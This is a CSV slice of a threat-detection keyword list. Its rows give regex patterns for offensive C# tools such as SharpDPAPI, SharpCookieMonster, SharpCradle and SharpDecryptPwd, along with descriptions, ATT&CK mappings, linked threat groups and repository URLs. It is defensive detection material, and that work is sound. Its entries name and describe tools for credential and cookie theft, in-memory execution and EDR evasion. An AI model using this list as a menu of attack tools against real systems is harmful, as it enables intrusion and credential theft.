"*SharpCompileServer*",".{0,1000}SharpCompileServer.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58881"
"*SharpCompileServer.exe*",".{0,1000}SharpCompileServer\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","58882"
"*SharpConfigParser.dll*",".{0,1000}SharpConfigParser\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","58883"
"*SharpCookieMonster*",".{0,1000}SharpCookieMonster.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58884"
"*sharpcookiemonster*",".{0,1000}sharpcookiemonster.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58885"
"*SharpCookieMonster*WebSocket4Net.dll*",".{0,1000}SharpCookieMonster.{0,1000}WebSocket4Net\.dll.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58886"
"*SharpCookieMonster.csproj*",".{0,1000}SharpCookieMonster\.csproj.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58887"
"*SharpCookieMonster.exe*",".{0,1000}SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58888"
"*SharpCookieMonster.exe*",".{0,1000}SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58889"
"*SharpCookieMonster.sln*",".{0,1000}SharpCookieMonster\.sln.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58890"
"*SharpCookieMonsterOriginal.exe*",".{0,1000}SharpCookieMonsterOriginal\.exe.{0,1000}","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tool","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","N/A","3","202","44","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z","58891"
"*SharpCradle*logonpasswords*",".{0,1000}SharpCradle.{0,1000}logonpasswords.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","N/A","10","10","279","57","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z","58892"
"*SharpCradle.exe*",".{0,1000}SharpCradle\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","N/A","10","10","279","57","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z","58893"
"*SharpCradle.exe*",".{0,1000}SharpCradle\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58894"
"*SharpCrashEventLog*",".{0,1000}SharpCrashEventLog.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58895"
"*SharpCrashEventLog.exe*",".{0,1000}SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58896"
"*SharpDcomTrigger.exe*",".{0,1000}SharpDcomTrigger\.exe.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","58897"
"*SharpDecryptPwd *",".{0,1000}SharpDecryptPwd\s.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58898"
"*SharpDecryptPwd.Commands*",".{0,1000}SharpDecryptPwd\.Commands.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58899"
"*SharpDecryptPwd.csproj*",".{0,1000}SharpDecryptPwd\.csproj.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58900"
"*SharpDecryptPwd.exe*",".{0,1000}SharpDecryptPwd\.exe.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","1","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58901"
"*SharpDecryptPwd.exe*",".{0,1000}SharpDecryptPwd\.exe.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","1","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58902"
"*SharpDecryptPwd.Lib*",".{0,1000}SharpDecryptPwd\.Lib.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58903"
"*SharpDecryptPwd.Properties*",".{0,1000}SharpDecryptPwd\.Properties.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","58904"
"*SharpDir.exe*",".{0,1000}SharpDir\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58905"
"*SharpDllProxy*",".{0,1000}SharpDllProxy.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","N/A","8","792","102","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z","58906"
"*SharpDomainSpray*",".{0,1000}SharpDomainSpray.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","58907"
"*SharpDomainSpray.*",".{0,1000}SharpDomainSpray\..{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","58908"
"*SharpDomainSpray-master*",".{0,1000}SharpDomainSpray\-master.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","58909"
"*SharpDoor.exe*",".{0,1000}SharpDoor\.exe.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","58910"
"*SharpDoor-master*",".{0,1000}SharpDoor\-master.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","58911"
"*SharpDoor-master*",".{0,1000}SharpDoor\-master.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","58912"
"*SharpDPAPI backupkey *",".{0,1000}SharpDPAPI\sbackupkey\s.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58913"
"*SharpDPAPI backupkey*",".{0,1000}SharpDPAPI\sbackupkey.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58914"
"*SharpDPAPI backupkey*",".{0,1000}SharpDPAPI\sbackupkey.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58915"
"*SharpDPAPI backupkey*",".{0,1000}SharpDPAPI\sbackupkey.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58916"
"*SharpDPAPI completed in *",".{0,1000}SharpDPAPI\scompleted\sin\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58917"
"*SharpDPAPI completed in *",".{0,1000}SharpDPAPI\scompleted\sin\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpDPAPI","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58918"
"*SharpDPAPI*",".{0,1000}SharpDPAPI.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","58919"
"*SharpDPAPI* credentias *",".{0,1000}SharpDPAPI.{0,1000}\scredentias\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58920"
"*SharpDPAPI* vaults *",".{0,1000}SharpDPAPI.{0,1000}\svaults\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58921"
"*SharpDPAPI.Commands.*",".{0,1000}SharpDPAPI\.Commands\..{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#content","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58922"
"*SharpDPAPI.csproj*",".{0,1000}SharpDPAPI\.csproj.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58923"
"*SharpDPAPI.Domain*",".{0,1000}SharpDPAPI\.Domain.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58924"
"*SharpDPAPI.exe*",".{0,1000}SharpDPAPI\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58925"
